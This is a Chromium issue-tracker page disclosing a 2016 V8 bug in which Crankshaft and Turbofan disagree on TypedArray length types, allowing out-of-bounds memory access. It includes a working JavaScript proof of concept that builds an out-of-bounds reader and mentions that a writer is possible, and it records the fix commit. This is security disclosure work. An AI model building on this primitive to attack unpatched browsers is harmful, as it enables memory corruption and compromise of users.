Security: OOB read/write in V8 using TypedArrays+Crankshaft+Turbofan |
||||
Issue descriptionVULNERABILITY DETAILS As of [1], Turbofan expects a JSTypedArray's length field to always contain a Smi, but Crankshaft can be tricked into storing the length as a HeapNumber. Turbofan-optimized code will then read the upper half of this HeapNumber's pointer as an int32 and perform a bogus bounds check against it. This allows OOB r/w accesses. Since most of the system agrees with Turbofan that those length values should be Smis, the appropriate fix is to ensure that Crankshaft is aligned with this assumption. [1] https://codereview.chromium.org/2320473003/diff/80001/src/compiler/access-builder.cc VERSION Chrome Version: current ToT, M55-Dev Operating System: all (only x64) REPRODUCTION CASE function c4(w, h) { var size = w * h; if (size < 0) size = 0; return new Uint32Array(size); } for (var i = 0; i < 3; i++) { // Computing -0 as the result makes the "size = w * h" multiplication IC // go into double mode. c4(0, -1); } // Optimize Uint32ConstructFromLength. for (var i = 0; i < 1000; i++) c4(2, 2); // This array will have a HeapNumber as its length: var bomb = c4(2, 2); // By the same principle, a writer could be constructed :-) function reader(o, i) { // Dummy try-catch, so that TurboFan is used to optimize this. try {} catch(e) {} return o[i]; } // Optimize reader! for (var i = 0; i < 3; i++) reader(bomb, 0); %OptimizeFunctionOnNextCall(reader); reader(bomb, 0); for (var i = bomb.length; i < 1000; i++) { // All these *should* be undefined... print(i + " : " + reader(bomb, i)); }
,
Sep 26 2016
The following revision refers to this bug: https://chromium.googlesource.com/v8/v8.git/+/142f9dfcade6e5010468cb6f55ef9512c1993b27 commit 142f9dfcade6e5010468cb6f55ef9512c1993b27 Author: jkummerow <jkummerow@chromium.org> Date: Mon Sep 26 23:00:28 2016 [crankshaft] TypedArrayInitialize: force length to be a Smi BUG= chromium:650404 Review-Url: https://codereview.chromium.org/2371963002 Cr-Commit-Position: refs/heads/master@{#39744} [modify] https://crrev.com/142f9dfcade6e5010468cb6f55ef9512c1993b27/src/crankshaft/hydrogen.cc [add] https://crrev.com/142f9dfcade6e5010468cb6f55ef9512c1993b27/test/mjsunit/regress/regress-crbug-650404.js
,
Sep 26 2016
,
Sep 27 2016
,
Jan 3 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
||||
►
Sign in to add a comment |
||||
Comment 1 by elawrence@chromium.org
, Sep 26 2016